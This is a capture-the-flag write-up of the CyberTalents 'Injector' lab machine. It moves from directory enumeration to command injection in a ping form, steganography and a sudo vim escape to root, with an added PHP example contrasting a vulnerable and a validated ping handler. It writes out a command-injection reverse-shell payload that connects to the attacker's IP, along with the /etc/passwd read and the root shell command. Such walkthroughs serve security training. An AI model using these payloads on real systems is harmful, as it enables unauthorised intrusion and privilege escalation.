Cybertalents Injector Machine
Hello, I’m Omar! I hope y’all are safe and still following me after my last writeup xD Today I’ll share with you my writeup for the Injector machine from CyberTalents.
First of all, you should connect to the CyberTalents VPN; you will see the instructions in the file given.
I’ll start with the enumeration.
Hmm, we find port 22 open for SSH and port 80 for HTTP (web server) running Apache/2.4.29.
Let’s discover the web server…
Sorry for my weak machine :”
We’ll see the default Apache page; it’s automatically generated when you install Apache.
Nothing got my attention or interest, so let’s discover the hidden directories & files using dirsearch:
dirsearch -u http://172.24.170.117/ -e *
We will get this result.
The secret directory is interesting;
let’s open the directory in the browser.
Nothing interesting; let’s discover what’s in it using the same command line.
When I found admin.html I stopped the tool, went to admin.html and said “finally”, then the page loaded :)
I ran the tool again and let it complete the scan :D
I went through all the directories and found that /tools didn’t troll me: in /tools I found “ping.php”.
Before I went in, I knew it would be a Command Injection vulnerability.
Okay, open the PHP page and we will see an input; if we put 127.0.0.1 and click lookup, the server will ping the IP.
It’s so simple, let’s get a quick reverse shell.
I’ll use PHP for the reverse shell, and my command is:
127.0.0.1; php -r '$sock=fsockopen("172.24.143.xx",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
Before you execute the command, we should start a netcat listener first,
and then click lookup in the web page.
Okay, we now have a reverse shell.
Let’s spawn a terminal (I don’t know why, but I do it) using
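Why the lookup form behaves this way, as an added example that is not the machine's actual ping.php or the author's code: the assumed vulnerable handler pastes the submitted value into a shell command line, while the hardened one accepts only an IPv4 literal and quotes it before it reaches the shell. The function names and ping options are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example: a hypothetical reconstruction, not the machine's real ping.php.

// Assumed vulnerable pattern: the form value is pasted into a shell command line,
// so a value such as "127.0.0.1; <command>" makes /bin/sh run a second command.
function ping_vulnerable(string $input): string
{
    return (string) shell_exec('ping -c 1 ' . $input);
}

// Accept only a dotted-quad IPv4 literal; anything else is rejected outright.
function validate_target(string $input): ?string
{
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

// Hardened handler: validate first, then quote the single argument anyway
// (defence in depth) so the shell never sees metacharacters from the user.
function ping_hardened(string $input): array
{
    $ip = validate_target($input);
    if ($ip === null) {
        return ['ok' => false, 'output' => 'Invalid IPv4 address'];
    }
    $lines = [];
    $code = 1;
    exec('ping -c 1 -W 2 ' . escapeshellarg($ip) . ' 2>&1', $lines, $code);
    return ['ok' => $code === 0, 'output' => implode("\n", $lines)];
}

// Constructed sample inputs: only the validation step is exercised here,
// so the demo runs offline and never calls the vulnerable function.
if (PHP_SAPI === 'cli') {
    $samples = ['127.0.0.1', ' 10.0.0.5 ', '127.0.0.1; id', '$(id)',
                '-c 100000 127.0.0.1', 'localhost'];
    foreach ($samples as $s) {
        $verdict = validate_target($s) === null ? 'rejected' : 'accepted';
        printf("%-24s %s\n", json_encode($s), $verdict);
    }
}
```

Only the first two samples are accepted; everything carrying shell metacharacters, option-like prefixes or a hostname is rejected before any command line is built.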
python3 -c 'import pty;pty.spawn("/bin/bash")';
Now we’re www-data and we should get a user. After 2 days of trying & searching, I went back to the photo I found in /var/www, a JPG photo called TrollFace.jpg.
Let’s copy it to our machine using this netcat method.
I tried to use strings on the image but it was useless, so I tried
steghide extract -sf TrollFace.jpg without a passphrase, and it worked!
Let’s cat the file.
We got a password; let’s see our users. Just cat /etc/passwd and we will see user alex.
Let’s switch user to alex using ‘su’ and use the password we got from TrollFace.jpg.
Let’s do some privilege escalation. First I ran sudo -l to show the commands that run with root permissions.
Vim runs with root permissions. Here we go: after asking my friend ‘Hameed’, he gave me this command and it works well. Thank you!
sudo vim -c ' : ! /bin/sh ' /usr/bin/vim
We got a root shell!
Thank you for reading. Any questions? Contact me on Facebook!